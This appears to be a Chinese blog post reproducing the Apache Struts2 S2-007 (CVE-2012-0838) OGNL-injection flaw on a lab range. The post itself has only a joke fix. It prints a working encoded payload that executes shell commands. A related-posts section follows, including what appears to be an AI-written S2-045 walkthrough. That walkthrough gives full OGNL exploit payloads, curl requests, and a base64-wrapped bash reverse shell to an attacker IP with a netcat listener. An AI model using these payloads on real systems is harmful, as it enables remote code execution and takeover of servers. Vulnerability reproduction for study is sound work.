[漏洞复现]Apache Struts2/S2-007(CVE-2012-0838)

ApacheStruts2漏洞复现与处置:远程代码执行风险
原创 已于 2024-01-17 13:02:40 修改 · 612 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全

于 2024-01-14 13:28:38 首次发布
本文分析了ApacheStruts2的一个安全漏洞,攻击者可通过恶意输入执行任意代码。复现步骤详细描述,最后提供漏洞处置建议,包括关闭靶场并防止进一步攻击。

一、漏洞情况分析

2.2.3.1 之前的 Apache Struts 2 在处理转换错误期间将字符串评估为 OGNL 表达式,这允许远程攻击者通过对字段的无效输入来修改运行时数据值,从而执行任意代码。

二、漏洞复现

春秋云境.com

进入靶场

开始复现

name=&email=&age=%27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew+java.lang.Boolean%28%22false%22%29+%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27cat%20%2Fflag%27%29.getInputStream%28%29%29%29+%2B+%27

可以看到相应结果的age框中有flag,至此复现完成

三、漏洞处置建议 

把靶场关了,跟漏洞说“白白”

[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391)
qq_51577576的博客
10-15 1637
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391) S2-008 涉及多个漏洞,主要利用对传入参数没有严格限制,导致多个地方可以执行恶意代码。 第一种情况其实就是 S2-007,在异常处理时的OGNL 执行第二种的cookie的方式,虽然在struts2没有对恶意代码进行限制,但是java的webserver(Tomcat),对cookie 的名称有较多限制,在传入struts2之前就被处理,从而较为鸡肋第三种需要开启devModedebug 模式。
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞 S2-005 (CVE-2010-1870)
qq_51577576的博客
10-14 1495
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞 S2-005 (CVE-2010-1870) s2-005漏洞的起源源于S2-003(受影响版本: 低于Struts 2.0.12)struts2会将http的每个参数名解析为OGNL语句执行(可理解为java代码)。OGNL表达式通过#来访问struts的对象,struts框架通过过滤#字符防止安全问题,然而通过unicode编码(\u0023)或8进制(\43)即绕过了安全限制,对于S2-003漏洞,官方通过增加安全配置(禁止静态方法调用
Struts2 漏洞复现之s2-007
weixin_51220765的博客
12-14 1268
Struts2 漏洞复现之s2-007 原理: age来自于用户输入,传递一个非整数给id导致错误,struts会将用户的输入当作ongl表达式执行,从而导致了漏洞 1.到007下 cd vulhub-master/struts2/s2-007 2.启动007 docker-compose up -d 3.访问靶机ip:8080 注意:如果此时报404错误,不要慌哦~ 我们去浏览器的历史记录里清除一下缓存,然后刷新一下页面就好了!具体步骤如下: 当页面回复正常后,我们就可以继续进行咯~ 3
Struts2_007_RCE CVE-2012-0838 漏洞复现
ADummy的博客
02-18 1208
Struts2_007_远程代码执行 by ADummy 0x00利用路线 ​ burpuite抓包—>修改payload—>重放包—>代码执行 0x01漏洞介绍 ​ 当<ActionName> -validation.xml配置的验证规则。如果类型验证转换失败,则服务器将拼接用户提交的表单值字符串,然后执行OGNL表达式解析并返回,造成OGNL表达式注入。从而可能造成远程执行代码。 ​ 当用户age以str而不是的形式提交时int,服务器将拼接"'" + valu
Struts S2-007复现
ZJT6666666的博客
12-21 680
Struts S2-007复现
漏洞复现----29、Struts2/S2-007
七天
06-29 2175
影响版本 2.0.0 - 2.2.3 漏洞原理 参考 http://rickgray.me/2016/05/06/review-struts2-remote-command-execution-vulnerabilities.html 当配置了验证规则 -validation.xml 时,若类型验证转换出错,后端默认会将用户提交的表单值通过字符串拼接,然后执行一次 OGNL 表达式解析并返回。例如这里有一个 UserAction: () public class UserAction extends Ac
S2-007漏洞复现
baidu_38844729的博客
11-14 371
漏洞原理 当用户提交 age 为字符串而非整形数值时,后端用代码拼接 "'" + value + "'" 然后对其进行 OGNL 表达式解析。要成功利用,只需要找到一个配置了类似验证规则的表单字段使之转换出错,借助类似 SQLi 注入单引号拼接的方式即可注入任意 OGNL 表达式。 影响版本:Struts2 2.0.0 - Struts2 2.2.3 漏洞利用 访问页面 http://local...
[旧文系列] Struts2历史高危漏洞系列-part2:S2-007/S2-008/S2-009
mole_exp的博客
01-18 2418
文章目录关于<旧文系列>前言S2-007漏洞复现与分析可回显PoC漏洞修复S2-008漏洞复现与分析Vuln-1:Remote command execution in CookieInterceptorVuln-2:Remote command execution in DebuggingInterceptorVuln-2:可回显PoC漏洞修复S2-009漏洞复现与分析可回显PoC漏洞修复Reference 关于<旧文系列> <旧文系列>系列是笔者将以前发到其他地方的技
[旧文系列] Struts2历史高危漏洞系列-part5:S2-052/S2-053/S2-057
mole_exp的博客
01-18 970
文章目录关于<旧文系列>前言S2-052漏洞复现与分析可回显PoC漏洞修复S2-053漏洞复现与分析可回显PoC漏洞修复S2-057漏洞复现与分析可回显PoC漏洞修复Reference 关于<旧文系列> <旧文系列>系列是笔者将以前发到其他地方的技术文章,挑选其中一些值得保留的,迁移到当前博客来。 文章首发于奇安信攻防社区: https://forum.butian.net/share/601 https://forum.butian.net/share/602 htt
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052CVE-2017-9805)
qq_51577576的博客
12-15 1986
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052CVE-2017-9805) Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。
Oracle Database Server 'TNS Listener'远程数据投毒漏洞CVE-2012-1675)的解决文档
05-25
安全厂家给出的解决办法: 链接:http://www.oracle.com/technetwork/topics/security/alert-cve-2012-1675-1608180.html 根据此链接得到解决方法: ? 1234 SolutionRecommendations for protecting against this vulnerability can be found at:My Oracle Support Note 1340831.1 for Oracle Database deployments that use Oracle Real Application Clusters (RAC).My Oracle Support Note 1453883.1 for Oracle Database deployments that do not use RAC. 目前这里环境不是RAC,参考文档1453883.1: Using Class of Secure Transport (COST) to Restrict Instance Registration (
Struts 2 远程代码执行漏洞(s2-045\s2-046)修复所用到的包
03-23
1.严格过滤 Content-Type 、filename里的内容,严禁ognl表达式相关字段。 2.如果您使用基于Jakarta插件,请升级到Apache Struts 2.3.322.5.10.1版本。(强烈推荐) 3.升级到2.3.32所用到的jar包: freemarker-2.3.22.jar ognl-3.0.19.jar struts2-convention-plugin-2.3.32.jar struts2-core-2.3.32.jar struts2-spring-plugin-2.3.32.jar xwork-core-2.3.32.jar --来源 http://mvnrepository.com/artifact/org.apache.struts/struts2-spring-plugin/2.3.32
struts2 CVE-2012-0838 S2-007 Remote Code Execution && Hotfix
weixin_34406796的博客
07-12 257
catalog 1. Description 2. Effected Scope 3. Exploit Analysis 4. Principle Of Vulnerability 5. Patch Fix   1. Description S2-007和S2-003、S2-005的漏洞源头都是一样的,都是struts2对OGNL的解析过程中存在漏洞,导致黑客可以通过OGN...
vulhub-struts2-S2-007 远程代码执行漏洞复现
qq_56426046的博客
06-19 410
影响版本: 2.0.0 - 2.2.3。
『Java安全Struts 2.2.3 表单参数类型转换错误OGNL注入漏洞S2-007复现与浅析
Ho1aAs‘s Blog
08-25 740
对表单参数使用validator验证时,如果遇到类型错误,参数值会先压入参数栈,之后会取出并被二次ognl解析。
S2-007远程代码执行漏洞CVE-2012-0838
m0_65150886的博客
01-09 675
类似于 sql 注入的 addslashes,对其中的单引号进行了转义,在 getOverrideExpr函数中进行了 StringEscape,从而无法闭合单引号,也就无法构造 OGNL 表达式。如果类型验证转换失败,则服务器将拼接用户提交的表单值字符串,然后执行OGNL表达式解析并返回。1.访问http://ip:port,出现如下页面,开始实验。burp抓包,修改post请求,查找底层目录信息。当作OGNL表达式执行,从而导致了漏洞。导致错误,struts会将用户的输入。
0x21.Apache Struts2远程代码执行漏洞(S2-007)复现
qq_31679787的博客
10-16 8066
s2-007:当配置了验证规则,类型转换出错时,进行了错误的字符串拼接,进而造成了OGNL语句的执行; 抓包,在age值处输入poc; poc:'+(#application)+' 判断出在age输入框存在s2-007漏洞; 输入poc查找key文件位置,得到key值; poc:%27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%...
s2-007远程代码执行漏洞
Stephen Wolf
11-15 2352
一、漏洞简述: age来自于用户输入,传递一个非整数给id导致错误,struts会将用户的输入当作ongl表达式执行,从而导致了漏洞。 影响版本: 2.0.0 - 2.2.3 二、环境搭建 vulhub里搭建环境(我发表过好多关于struts2漏洞的环境搭建,这些具体步骤都类似,详情前参考s2-045) 三、漏洞复现 访问ip+80...
S2-007-RCE(CVE-2012-0838)--vulhub
ccc_9wy的博客
12-28 451
struts2漏洞复现;S2-007;RCE漏洞CVE-2012-0838;反弹shell;OGNL表达式;Struts 2.0.0;msfconsole。
Struts2 漏洞(S2-045/CVE-2017-5638)复现
最新发布
10-31
<think>我们参考提供的引用内容,特别是引用[4]和引用[5]来回答用户的问题。用户明确要求复现S2-045漏洞CVE-2017-5638)。 根据引用[4]:该漏洞影响范围是使用基于Jakarta插件的文件上传功能时,通过修改HTTP请求头中的Content-Type值来触发漏洞。 引用[5]给出了具体的利用代码,是一个OGNL表达式,用于执行系统命令(例如反弹shell)。 复现步骤: 1. 环境搭建:使用vulhub提供的环境,进入s2-045目录,启动环境。 2. 构造恶意请求:利用curl或其他工具发送一个HTTP请求,在Content-Type头中插入恶意的OGNL表达式。 3. 执行命令:OGNL表达式会执行任意系统命令,如计算233*233(用于验证)或者反弹shell。 具体步骤: 步骤1:搭建漏洞环境 - 假设已经安装好docker和vulhub漏洞库。 - 进入对应目录:`cd vulhub/struts2/s2-045` - 启动环境:`docker-compose up -d` 步骤2:验证漏洞存在(以执行计算233*233为例) - 构造恶意请求,将以下命令中的URL替换为实际目标URL(通常是8080端口) - 命令示例: ```bash curl -v -X POST http://目标IP:8080/ -H "Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(233*233))}" ``` - 如果漏洞存在,返回的响应中会包含233*233的计算结果(54289)。 步骤3:执行反弹shell(可选) - 需要将OGNL表达式中的命令替换为反弹shell的命令,并替换IP和端口。 - 注意:OGNL表达式中的特殊字符需要进行适当编码(如引号、重定向符号等)。 - 引用[5]中给出了一个反弹shell的OGNL表达式示例,但注意该示例中使用了`bash -i>&/dev/tcp/ip/port 0>&1`,需要将`ip`和`port`替换为攻击机的IP和监听端口。 - 示例代码(注意:实际使用需要将单引号内的命令替换,并确保整个表达式正确): ```bash %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyLjEvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} ``` - 上面的反弹shell命令采用了base64编码(编码内容为`bash -i >& /dev/tcp/192.168.12.1/9999 0>&1`),以避免特殊字符问题。实际使用时需要将IP和端口替换成攻击机的IP和端口,并重新编码(注意:base64编码后替换示例中的`YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyLjEvOTk5OSAwPiYx`)。 步骤4:在攻击机上开启监听 - 使用nc命令监听端口:`nc -lvp 9999` 步骤5:发送恶意请求 - 将构造好的恶意Content-Type头放入POST请求中发送到目标。 注意事项: 1. 复现环境为实验环境,请勿用于非法用途。 2. 复现完成后,关闭环境:`docker-compose down` 引用说明: [^4] 提供了漏洞描述和环境搭建方法。 [^5] 提供了具体的利用代码。 根据以上步骤,我们可以完成S2-045漏洞复现。 </think>### Struts2 漏洞复现(S2-045/CVE-2017-5638) 根据引用内容和漏洞复现最佳实践,步骤如下: #### 一、漏洞原理 该漏洞源于Jakarta文件上传插件的异常处理机制。当攻击者**恶意构造`Content-Type`请求头**时,Struts2会错误执行其中的OGNL表达式,导致远程代码执行(RCE)[^4][^5]。影响范围: - Struts 2.3.5 - 2.3.31 - Struts 2.5 - 2.5.10 #### 二、复现步骤 1. **环境搭建** 使用Vulhub靶场(需提前安装Docker): ```bash cd vulhub/struts2/s2-045 # 进入漏洞目录 docker-compose up -d # 启动环境 docker ps # 确认容器运行(默认端口8080) ``` 2. **验证漏洞存在性** 执行测试命令(计算`233*233`): ```bash curl -v -X POST http://目标IP:8080/ \ -H "Content-Type: %{(#nike='multipart/form-data').(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(#ros.println(233*233))}" ``` **预期结果**:响应中包含`54289`(即$233^2$的计算结果)[^5]。 3. **获取反向Shell(关键步骤)** 修改OGNL表达式执行反弹Shell: ```bash # 替换以下内容: # <ATTACKER_IP> = 攻击机IP # <PORT> = 监听端口 PAYLOAD='%{(#nike="multipart/form-data").(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context["com.opensymphony.xwork2.ActionContext.container"]).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd="bash -c {echo,<BASE64_ENCODED_COMMAND>}|{base64,-d}|{bash,-i}").(#p=new java.lang.ProcessBuilder(#cmd)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))}' # 生成Base64编码的反弹Shell命令(示例): SHELL_CMD="bash -i >& /dev/tcp/<ATTACKER_IP>/<PORT> 0>&1" ENCODED_CMD=$(echo "$SHELL_CMD" | base64 | tr -d '\n') # 发送Payload curl -v -X POST http://目标IP:8080/ -H "Content-Type: $PAYLOAD" ``` **说明**:需提前在攻击机用`nc -lvp <PORT>`监听端口[^5]。 #### 三、防御建议 1. 升级到Struts 2.3.322.5.10.1+ 2. 禁用Jakarta文件上传插件 3. 在WAF中过滤异常`Content-Type`头(如包含`#`、`{`等符号) #### 复现注意事项 - 实验环境需隔离,避免影响真实系统 - Vulhub环境复现后关闭容器:`docker-compose down` - 反向Shell命令需根据目标系统调整(Windows/Linux) --- ### 相关问题 1. Struts2其他高危漏洞(如S2-005、S2-046)的利用原理有何异同? 2. 如何通过流量特征检测Struts2 OGNL注入攻击? 3. 除文件上传外,Struts2还有哪些常见攻击面? [^1]: vulhub漏洞复现篇:s2-046 [^2]: vulhub漏洞复现篇:S2-005 [^3]: Struts2(s2-045)漏洞分析 [^4]: vulhub漏洞复现篇:s2-045 [^5]: vulhub-Struts2-045漏洞复现
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值